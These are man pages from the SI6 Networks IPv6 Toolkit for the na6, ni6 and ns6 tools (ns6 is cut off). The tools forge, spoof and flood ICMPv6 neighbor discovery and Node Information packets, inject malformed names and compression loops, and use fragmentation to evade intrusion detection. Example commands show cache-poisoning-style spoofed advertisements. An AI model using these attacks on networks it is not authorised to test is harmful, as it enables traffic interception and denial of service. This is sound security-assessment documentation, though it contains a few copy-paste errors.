SYNOPSIS .B na6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-D LINK-DST-ADDR] [\-t TARGET_ADDR[/LEN]] [\-r] [\-c] [\-o] [\-E LINK_ADDR] [\-e] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-w PREFIX[/LEN]] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-W PREFIX[/LEN]] [\-F N_SOURCES] [\-T N_TARGETS] [\-L | \-l] [\-z] [\-v] [\-V] [\-h] .SH DESCRIPTION .B na6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Neighbor Advertisement messages. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 Protocols. This tool has two modes of operation: active and passive. In active mode, the tool attacks a specific target, while in passive mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if a destination address (IPv6 Destination Address or Ethernet Destination Address) and a Target Address are specified. Passive mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are set, the attack is launched against the specified target, and then the tool enters passive mode to respond incoming Neighbor Solicitation messages with Neighbor Advertisement (attack) packets. The tool supports filtering of incoming Neighbor Solicitation messages based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, the IPv6 Destination Address, and the Neighbor Solicitation Target Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming Neighbor Solicitation message matches any of those filters, the message is discarded (and thus no Neighbor Advertisements are sent in response). If any "accept filter" is specified, incoming Neighbor Solicitation messages must match the specified filters in order for the na6 tool to respond with Neighbor Advertisement messages. .SH OPTIONS .B na6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the Neighbor Advertisements, it may be necessary for the na6 tool to split that information into more than one Neighbor Advertisement message. Also, if the tool is instructed to flood the victim with Neighbor Advertisements from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. na6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Neighbor Advertisement message. However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If left unspecified, a random link-local unicast address (fe80::/64) is selected. If the "\-T" ("\-\-flood\-targets") option is specified, this option includes an IPv6 prefix. See the description of the "\-T" option for further information on how the "\-s" option is processed in that specific case. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. If left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. When operating in passive mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming Neighbor Solicitation message. If the IPv6 Source Address of the Neighbor Solicitation is the unspecified address (::), the "all-nodes link-local multicast" address (ff02::1) is used as the IPv6 Destination Address. Otherwise, the IPv6 Source Address of the incoming Neighbor Solicitation message is used as the IPv6 Destination Address of the outgoing Neighbor Advertisement (attack) messages. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the Neighbor Advertisement messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Neighbor Advertisement messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Neighbor Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. When operating in passive mode, the link\-layer Source Address is selected according to the IPv6 Destination Address of the incoming Neighbor Solicitation message. If the IPv6 Destination Address of the incoming Neighbor Solicitation message is a multicast address (usually a solicited-node multicast address), the link\-layer Source Address is set to the address specified by the "\-S" option (or to a random address if the "\-S" option was left unspecified). If the IPv6 Destination Address of the incoming Neighbor Solicitation is not a multicast address (i.e., it is a unicast address), the link\-layer Source Address is set to the Ethernet Destination Address of the incoming Neighbor Solicitation message. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Neighbor Advertisement messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to the "all-nodes link-local multicast" address (ff02::1). When operating in passive mode, the link\-layer Destination Address is set according to the IPv6 Source Address of the incoming Neighbor Solicitation message. If the IPv6 Source Address of the incoming Neighbor Solicitation message is the unspecified address (::), the link\-layer destination address is set to "33:33:00:00:00:01" (the Ethernet multicast address corresponding to the IPv6 "all-nodes link-local multicast" address). Otherwise, the link\-layer Destination Address is set to the link\-layer Source Address of the incoming Neighbor Solicitation message. .TP \-\-router, \-r This option instructs the na6 tool to set the "R" (Router) bit in the Neighbor Advertisement messages that it sends. The "R" bit indicates that the node sending the message is a router. If left unspecified, the "R" bit is not set. .TP \-\-solicited, \-c This option instructs the na6 tool to set the "S" ("Solicited") bit in the Neighbor Advertisement messages that it sends. When operating in passive mode ("\-L" option), the "Solicited" flag is forced to 1 in all responses sent to unicast IPv6 addresses. .TP \-\-override, \-o This option instructs the na6 tool to set the ‘O’ ("Override") bit in the Neighbor Advertisement messages that it sends. If this option is left unspecified, the ‘O’ bit is not set. .TP \-\-target, \-t This option specifies the IPv6 Target Address of the Neighbor Advertisement messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-target\-lla\-opt, \-E This option specifies the contents of a target link\-layer address option to be included in the Neighbor Advertisement messages. If a single option is specified, it is included in all the outgoing Neighbor Advertisement messages. If more than one target link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Neighbor Advertisement message, multiple Neighbor Advertisements will be sent as needed. .TP \-\-add\-tlla\-opt, \-e This option instructs the na6 tool to include a target link\-layer address option in the Neighbor Advertisement messages that it sends. The target link\-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Neighbor Advertisement messages. The difference between this option and the "\-E" option is that the "\-e" option does not specify the actual value of the option, but just instructs the tool to include a target link\-layer address option (the actual value of the option is selected as explained before). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-block\-target, \-w This option sets a block filter for the incoming Neighbor Solicitation messages, based on their Target Address. It allows the specification of an IPv6 prefix in the form "\-w prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-accept\-target, \-W This option sets a accept filter for the incoming Neighbor Solicitation messages, based on their Target Address. It allows the specification of an IPv6 prefix in the form "\-W prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP \-\-flood\-targets, \-T This option instructs the na6 tool to send Neighbor Advertisements for multiple Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix fe80::/64, unless a different prefix has been specified by means of the "\-t" option. The IPv6 Source Address of each Neighbor Advertisement message is set according to the IPv6 address or prefix specified with the "\-s" option, and defaults to a random link-local unicast address (fe80::/64) if the "\-s" option is left unspecified. .TP \-\-flood\-sources, \-F This option instructs the tool to send multiple Neighbor Advertisement messages with different Source Addresses. The number of different sources is specified as "\-F number". The Source Address of each Neighbor Advertisement is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Router Advertisement messages that do not have a link-local unicast address as the Source Address. .TP \-\-loop, \-l This option instructs the na6 tool to send periodic Neighbor Advertisements to the victim node. The amount of time to pause between sending Neighbor Advertisements can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Neighbor Solicitations (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the na6 tool to operate in passive mode (possibly after attacking a given node, if the ‘\-d’ or ‘\-D’ options were specified). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the na6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the na6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B na6 tool. \fBExample #1\fR # na6 \-i eth0 \-d fe80::1 \-t 2001:db8::1 \-c \-o \-e Use the network interface "eth0" to send a Neighbor Advertisement using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination address ffe80::1 and the Ethernet Destination Address 33:33:00:00:00:01 (selected by default). The target of the Neighbor Advertisement is 2001:db8::1, and the message has both the "Override" and the "Solicited" flags set. The Neighbor Advertisement also includes a target link\-layer address option that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # na6 \-i eth0 \-j fe80::1 \-j 2001:db8::/32 \-W fe80::/64 \-c \-o \-e \-L \-v \-v Listen for incoming Neighbor Solicitation messages on the interface "eth0". Discard those messages that have an IPv6 Source Address equal to fe80::1, an IPv6 Source Address that belongs to the prefix 2001:db8::/32, or a Target Address that does not belong to the prefix fe80::/64. Respond (to those messages that are accepted) with a Neighbor Advertisement with a randomized Ethernet Source Address and a randomized link-local unicast IPv6 Source Address (unless the Destination Address of the Neighbor Solicitation was a unicast address), the IPv6 Destination Address set to the Source Address of the incoming NS message (unless it was the unspecified address), the Target Address set to the same value as the Target Address of the incoming NS, and the "Solicited" and "Override" flags set. Be very verbose ("\-v \-v" options). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B na6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/ni6.1000066400000000000000000000373711223702747200162470ustar00rootroot00000000000000.TH NI6 1 .SH NAME nI6 \- A security assessment tool for attack vectors based on ICMPv6 Node Information messages .SH SYNOPSIS .B ni6 .RB [\| \-i .IR INTERFACE\| ] [\-S LINK_SRC_ADDR | \-R] [\-D LINK_DST_ADDR] [\-s SRC_ADDR[/LEN] | \-r] [\-d DST_ADDR] [\-c HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-P SIZE | \-6 IPV6_ADDR | \-4 IPV4_ADDR | \-n NAME | \-N LEN | \-x LEN \-o TYPE] [\-Z SIZE] [\-e] [\-C ICMP6_CODE] [\-q NI_QTYPE] [\-X NI_FLAGS] [\-P SIZE | \-w IPV6_ADDR | \-W IPV4_ADDR | \-a NAME | \-A LEN | \-Q LEN \-O TYPE] [\-E] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B ni6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 Node Information messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. This tool has two modes of operation: "active" and "listening". In "active" mode, the tool attacks a specific target, while in "listening" mode the tool listens to ICMPv6 Node Information Query messages on the local network, and sends ICMPv6 Node Information Reply messages in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. Listening mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters listening mode to respond incoming packets with TCP segments. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no ICMPv6 NI Reply messages are sent in response). If any "accept filter" is specified, incoming packets must match any of the specified "accept filters" in order for the tool to respond with ICMPv6 NI Reply messages. .SH OPTIONS .B ni6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). ni6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If an IPv6 prefix is specified, the IPv6 Source Address of the ICMPv6 packets will be randomized from the specified prefix. Note: When operating in "listening" mode, the Source Address is automatically selected depending on the IPv6 Destination Address of the ICMPv6 NI Query (unless a specific IPv6 Source Address has been specified with the "\-s" option). .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (i.e., if the tool is to operate in "listening" mode). Note: When operating in "listening" mode, the Destination Address is automatically set to the Source Address of the incoming ICMPv6 NI Query message. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the IPv6 packets. It is randomized by default. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the TCP segments. If left unspecified, the link\-layer Source Address is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the ICMPv6 NI packets. By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer of the first-hop router. .TP \-\-payload\-size, \-P This options specifies the size (in bytes) of the ICMPv6 NI payload. .TP \-\-subject\-ipv6, \-6 This option specifies an IPv6 Address to be used as the Subject of ICMPv6 Node Information Query messages. .TP \-\-subject\-ipv4, \-4 This option specifies an IPv4 Address to be used as the Subject of ICMPv6 Node Information Query messages. .TP \-\-subject\-name, \-n This option specifies a Name to be used as the Subject of ICMPv6 Node Information Query messages. By default, the specified name is considered to be a Fully-Qualified Domain Name (FQDN). Please consult the "\-\-sname\-slabel" option for instructions on how to specify "single-label" names. .TP \-\-subject\-fname, \-N This option instructs the ni6 tool to set the Subject of ICMPv6 NI Query messages to a forged name of the specified length. Note: The forged name is a sequence of labels of 'a' characters, with the maximum label size being specified by means of the "\-\-max\-label\-size" option. .TP \-\-subject\-ename, \-x This option instructs the ni6 tool to set the Subject of an ICMPv6 NI Query message to a malformed label of the specified length. This option is useful for including a malformed label that "spans past the end of the ICMPv6 NI Query". .TP \-\-subject\-nloop, \-O This option specifies that the Data field should be set to a Name that contains a DNS compression loop. The loop type is specified with this option, with valid values being in the range 0\-1. .TP \-\-sname\-slabel, \-e This option specifies that the specified Subject Name is a single-label name, and hence should be terminated with two (rather than one) NULL labels. .TP \-\-max\-label\-size, \-Z This option specifies the maximum Name label size. It defaults to 63. .TP \-\-code, \-C This option specified the ICMPv6 code. For ICMPv6 NI Query messages, if specific Subject type is specified, the ICMPv6 code is automatically set to the corresponding value. .TP \-\-qtype, \-q This option specifies the Qtype value of ICMPv6 NI messages. For ICMPv6 NI Reply messages, if specific Data type is specified, the ICMPv6 Qtype is automatically set to the corresponding value. .TP \-\-flags, \-X This option specified the "Flags" field of the ICMPv6 NI messages. For ICMPv6 NI Query messages of Qtype 3 (Node IPv6 Addresses), the "Flags" field defaults to "GSLCA". For ICMPv6 NI Query messages of Qtype 4 (Node IPv4 Addresses), the "Flags" field defaults to "A". For other ICMPv6 NI Query messages it defaults to 0. For ICMPv6 Reply messages, the "Flags" field is copied from the corresponding ICMPv6 NI Query message. .TP \-\-data\-ipv6, \-w This option specifies an IPv6 Address to be used as the Data of ICMPv6 Node Information Reply messages. .TP \-\-data\-ipv4, \-W This option specifies an IPv4 Address to be used as the Data of ICMPv6 Node Information Reply messages. .TP \-\-data\-name, \-a This option specifies a Name to be used as the Data of ICMPv6 Node Information Reply messages. By default, the specified name is considered to be a Fully-Qualified Domain Name (FQDN). Please consult the "\-\-dname\-slabel" option for instructions on how to specify "single-label" names. .TP \-\-data\-fname, \-A This option instructs the ni6 tool to set the Data of the ICMPv6 NI Reply messages to a forged name of the specified length. Note: The forged name is a sequence of labels of 'a' characters, with the maximum label size being specified by means of the "\-\-max\-label\-size" option. .TP \-\-data\-ename, \-Q This option instructs the ni6 tool to set the Data of ICMPv6 NI Reply messages to a malformed label of the specified length. This option is useful for including a malformed label that "spans past the end of the ICMPv6 NI Reply". .TP \-\-data\-nloop, \-O This option specifies that the Data field should be set to a Name that contains a DNS compression loop. The loop type is specified with this option, with valid values being in the range 0\-2. .TP \-\-dname\-slabel, \-E This option specifies that the specified Data Name is a single\-label name, and hence should be terminated with two (rather than one) NULL labels. .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-forge\-src\-addr, \-r This option instructs the ni6 tool to forge the IPv6 Source Address of ICMPv6 NI messages. Note that when operating in listening mode, unless this tool is set, ni6 will not impersonate other nodes. .TP \-\-forge\-link\-src\-addr, \-R This option instructs the ni6 tool to forge the link\-layer Source Address of ICMPv6 NI messages. Note: Some interface cards (or their corresponding drivers) may silently discard packets that contain a forged link\-layer Source Address. .TP \-\-loop, \-l This option instructs the tcp6 tool to send periodic TCP segments to the victim node. The amount of time to pause between sending TCP segments can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending ICMPv6 Node Information Query messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the ni6 tool to operate in listening mode (possibly after attacking a specified target). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the ni6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the ni6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B ni6 tool. \fBExample #1\fR # ni6 \-i eth0 \-\-subject\-ipv6 ff02::1 \-d ff02::1 \-q 2 \-v Send an ICMPv6 Node Information Query to the multicast address ff02::1 ("\-d" option), with a Subject IPv6 Address of "ff02::1" ("\-\-subject\-ipv6" option), querying for Node names ("\-q" option). Be verbose. \fBExample #2\fR # ni6 \-i eth0 \-\-data\-fname 1000 \-L \-\-forge\-src\-addr \-v Listen to incoming ICMPv6 Node Information Query messages querying for node names, and respond with ICMPv6 NI Reply messages that contain a forged name of 700 bytes. Forge the IPv6 Source Address of the packets. Be verbose. .SH AUTHOR The .B ni6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/ns6.1000066400000000000000000000237031223702747200162530ustar00rootroot00000000000000.TH NS6 1 .SH NAME ns6 \- A security assessment tool for attack vectors based on ICMPv6 Neighbor Solicitation messages .SH SYNOPSIS .B ns6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-E LINK_ADDR] [\-e] [\-t TARGET_ADDR[/LEN]] [\-F N_SOURCES] [\-T N_TARGETS] [\-z SECONDS] [\-l] [\-v] [\-h] .SH DESCRIPTION .B ns6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Neighbor Solicitation messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .SH OPTIONS .B ns6 The ns6 tool takes its parameters by means of command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options) to be conveyed into the Neighbor Solicitations, it may be necessary for the ns6 tool to split that information into more than one Neighbor Solicitation message. Also, when the ns6 tool is instructed to flood the victim with Neighbor Solicitations from different sources ("\-\-flood\-sources" option), multiple packets may need to be sent. ns6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Neighbor Solicitation message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option is meant to specify the IPv6 Source Address to be used for the Neighbor Solicitation messages. If left unspecified, a randomized link-local (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the Neighbor Solicitation messages. If this option is left unspecified, but the Ethernet Destination Address is specified, the "all-nodes link-local multicast" address (ff02::1) is selected as the IPv6 Destination Address. .TP \-\-hop\-limit, \-A This option specifies the IPv6 Hop Limit to be used for the Neighbor Solicitation messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Neighbor Solicitation messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an 